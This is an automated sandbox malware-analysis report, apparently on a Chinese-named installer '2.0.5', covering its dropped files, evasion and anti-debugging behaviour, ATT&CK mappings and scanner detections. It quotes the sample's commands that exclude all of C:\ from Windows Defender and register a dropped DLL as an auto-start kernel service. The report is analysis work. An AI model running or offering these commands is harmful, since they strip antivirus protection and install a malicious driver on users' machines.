Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4219
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Window / User API: threadDelayed 549
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Window / User API: threadDelayed 572
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Window / User API: threadDelayed 527
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-R44JL.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | API coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408 | Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CC0AEC0 FindFirstFileA,FindClose, | 6_2_6CC0AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F06868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, | 11_2_00F06868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F07496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, | 11_2_00F07496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F09C60 GetSystemInfo, | 11_2_00F09C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000002.2167704241.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\}7
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000002.2167704241.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}p6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CA93886 NtSetInformationThread 00000000,00000011,00000000,00000000 | 6_2_6CA93886
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CC20181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 6_2_6CC20181
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F857D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, | 11_2_00F857D0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CC29D66 mov eax, dword ptr fs:[00000030h] | 6_2_6CC29D66
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CC29D35 mov eax, dword ptr fs:[00000030h] | 6_2_6CC29D35
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CC1F17D mov eax, dword ptr fs:[00000030h] | 6_2_6CC1F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CC18CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 6_2_6CC18CBD
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CC20181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 6_2_6CC20181

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.13.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE7700 cpuid 6_2_6CCE7700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F0AB2A GetSystemTimeAsFileTime,11_2_00F0AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00FA0090 GetVersion,11_2_00FA0090
ATT&CK matrix (listed per tactic; digits preceding a technique name are reproduced as the report displays them):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Command and Scripting Interpreter; 1 Service Execution; 1 Native API; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Access Token Manipulation; 1 Windows Service; 111 Process Injection; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 231 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 321 Security Software Discovery; 231 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 2 System Owner/User Discovery; 3 File and Directory Discovery; 25 System Information Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1579694. Sample: #U5b89#U88c5#U52a9#U624b_2.... Startdate: 23/12/2024. Architecture: WINDOWS. Score: 88.
Top-level signatures in the graph: Multi AV Scanner detection for submitted file; Found driver which could be used to inject code into processes; PE file contains section with special chars; 2 other signatures.
The graph image is not reproduced; the process and file relationships recorded in the graph data are:
  • #U5b89#U88c5#U52a9#U624b_2.0.5.exe drops C:\...\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PE32) and starts it; the root also starts two cmd.exe instances and 29 other processes, from which sc.exe instances (and their conhost.exe children) are started.
  • #U5b89#U88c5#U52a9#U624b_2.0.5.tmp drops C:\Users\user\AppData\Local\...\update.vac (PE32) and C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); signature: Adds a directory exclusion to Windows Defender; starts a second #U5b89#U88c5#U52a9#U624b_2.0.5.exe and powershell.exe (signature: Loading BitLocker PowerShell Module; children conhost.exe and WmiPrvSE.exe).
  • The second #U5b89#U88c5#U52a9#U624b_2.0.5.exe drops another C:\...\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PE32) and starts it.
  • That .tmp drops C:\Users\user\AppData\Local\...\update.vac (PE32), C:\Program Files (x86)\...\trash (copy) (PE32+), C:\Program Files (x86)\...\is-R44JL.tmp (PE32+) and 3 other files (1 malicious); signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger; starts 7zr.exe (twice) and cmd.exe.
  • 7zr.exe drops C:\Program Files (x86)\...\tProtect.dll (PE32+); both 7zr.exe instances start conhost.exe.

Source | Detection | Scanner
#U5b89#U88c5#U52a9#U624b_2.0.5.exe | 0% | ReversingLabs
#U5b89#U88c5#U52a9#U624b_2.0.5.exe | 8% | Virustotal
Source | Detection | Scanner
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal
C:\Program Files (x86)\Windows NT\hrsw.vbc | 11% | ReversingLabs
C:\Program Files (x86)\Windows NT\is-R44JL.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\update.vac | 11% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\update.vac | 11% | ReversingLabs
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Reputation
https://aria2.github.io/Usage: | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | false | high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b_2.0.5.exe | false | high
https://github.com/aria2/aria2/issuesReport | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | false | high
http://www.metalinker.org/ | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | false | high
